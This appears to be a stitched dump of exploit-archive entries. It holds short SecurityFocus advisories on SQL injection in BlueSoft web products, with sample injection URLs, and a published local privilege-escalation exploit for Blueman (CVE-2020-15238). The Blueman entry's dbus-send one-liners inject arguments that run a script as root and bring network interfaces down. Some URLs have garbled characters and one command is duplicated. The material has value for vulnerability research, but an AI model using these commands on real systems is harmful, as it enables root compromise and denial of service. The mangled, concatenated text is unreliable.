Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?cmd=10&ty=2[SQLi]
source: https://www.securityfocus.com/bid/49091/info
BlueSoft Banner Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/signup.php?referer_id=1[SQLi]
source: https://www.securityfocus.com/bid/48703/info
Multiple BlueSoft products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/demo5/search.php?realtor=2â??a
http://www.example.com/demo4/item.php?id=94edd43315507ad8509d7bfb2d2bc936â??a
http://www.example.com/demo3/search.php?c=47â??a
# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://github.com/blueman-project/blueman
# Software Link: https://github.com/blueman-project/blueman
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-15238
#
# By default installed on Ubuntu 16.04 - 20.10 and
# Debian 9 - 11
#
# Local root exploit when dhcpcd is used instead of dhclient
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
#
# The DhcpClient method of the d-bus interface to blueman-mechanism
# is prone to an argument injection vulnerability.
# On systems where the isc-dhcp-client package is removed
# and the dhcpcd package installed, this leads to Local
# Privilege Escalation to root from any unprivileged user.
# See attached python script for a working exploit. Or use
# this oneliner with a shellscript "/tmp/eye":
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/eye"
# This happens because the argument is not sanitized before
# being used as an argument to dhcpcd.
#
# Also on default installations with isc-dhcp-client installed,
# this can lead to DoS attacks by bringing any interface down
# as follows:
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"
# Or allows users to attach XDP objects to an interface:
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 name a"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"a xdp o /tmp/o"
# This both happens because the argument is passed to "ip link"
# unsanitized.